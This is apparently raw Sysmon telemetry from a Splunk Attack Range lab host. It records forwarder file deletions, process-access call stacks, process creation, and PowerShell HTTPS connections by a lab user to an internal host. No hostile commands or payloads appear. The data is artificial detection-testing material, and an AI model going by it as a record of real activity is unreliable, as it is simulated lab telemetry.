23542300x800000000000000036496149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:27.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B7ADB9AF78B2F664F2CB1F438A9C416,SHA256=2976C97CCE5339D7EEAE369440C39D1B86BE4412FCE97547000640497E0D47AF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:58.836{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50371-false10.0.1.12-8000- 23542300x800000000000000036496151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:28.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A19071F2D381C46B4458BA839C5B37BA,SHA256=B775EB921BA943A1DF99EBC6B15E67C686494937635FB14FB74B9DF4E8A99BCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:29.739{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC65B2CEBC9E6A13629C09302DA26FA3,SHA256=C996DACC5EE9003BD863F98B9BC2EB5F569BA7FEAC1BB4399539AFE01BC6A57D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:30.754{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C46308731B9A0C4BE959E278FC12B665,SHA256=D5C2D12C4C92583D1D0AE7129DA1A3C18C57AA9896018B47F56F500AC2850AF9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:01.596{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50372-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:31.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A2EB1EEF215F6D23CD7FB5ACAF998F,SHA256=A2B857BBEC4727807FFB54813A80A8771C5328A9DE0E0C737AAF13B9DD06334B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:31.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EDF5CA0FC29FE846FBAB5F7F33B55583,SHA256=7B6561F3BC30EB3E31A0C44FF63D88815B1995996874CB35AB1215928D54DB2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:32.817{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B1435A361E93760356229C0099E289C,SHA256=E8F3581B3C6E73C71CC33259FE2591F32032ECA1E0B3FAF8DF39B7A7FA39E93C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:32.368{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:04.030{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50374-false10.0.1.12-8089- 354300x800000000000000036496161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:03.878{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50373-false10.0.1.12-8000- 23542300x800000000000000036496160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:33.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40D936FA071F791D70F5CB56D644189F,SHA256=8610459860020FF7E4C252BF440210F14D7018978FACFA1C315423BACBE3151B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:34.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180EC6B618E5082E6D2EE24F6DDF404E,SHA256=38398FFBBE89EF60BD6AAA26407E901FE3BE37C8301ADC9B187AADAC3FCF5A6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:35.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F332313189FAFE9B8D6F6452F2C3CB2,SHA256=FBD5963C519C4C2869A2A97ECA2A90821107DE27842AA660F3C14E53A17889F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:35.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=56F26C3BA0D9610C3EE7C1EE8194BBF3,SHA256=FAA42B94ABFAD621A885EB485913477C648EDEFA8181D06E94E2EDF8B69E5D00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:36.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=949DD6B2A1133176A04B5E5DA86E202D,SHA256=38B6E50A26E2949FC246653C4AA6BE89E66426C3BBF3AB1199305D70C2FB0253,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:05.613{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50375-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32486DF472E4858FAE6E42B23EE8CC95,SHA256=FA33719AB1846DB444EC846C423A084A6B27CCBC430698BECA8C5B9132B4A552,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F4D-6140-4F56-04000000C801}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F4D-6140-4F56-04000000C801}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.863{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F4D-6140-4F56-04000000C801}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:37.848{B81B27B7-9F4D-6140-4F56-04000000C801}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BDA5E9E3EAE6575D254209DE5F14561,SHA256=4E5B027BC4C44F388C31E88FF39FB61D8EA04A183E86D5AB3C1123417E356DCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=545ABA38114B2CFC5B5F4D126A04B556,SHA256=F18625850F481B434E69001BD1DE9FE7E7438D28BAFEC261383FD783120F2368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DFB261E14E9CA1F1F3557C2D2CE927D,SHA256=27B3E22BE5B8D0A884735FF62FAC1E93BCD3370D3FF57F7D50D261F60FBD8937,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.751{B81B27B7-9F4E-6140-5056-04000000C801}96432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F4E-6140-5056-04000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-9F4E-6140-5056-04000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.562{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F4E-6140-5056-04000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:10:38.547{B81B27B7-9F4E-6140-5056-04000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 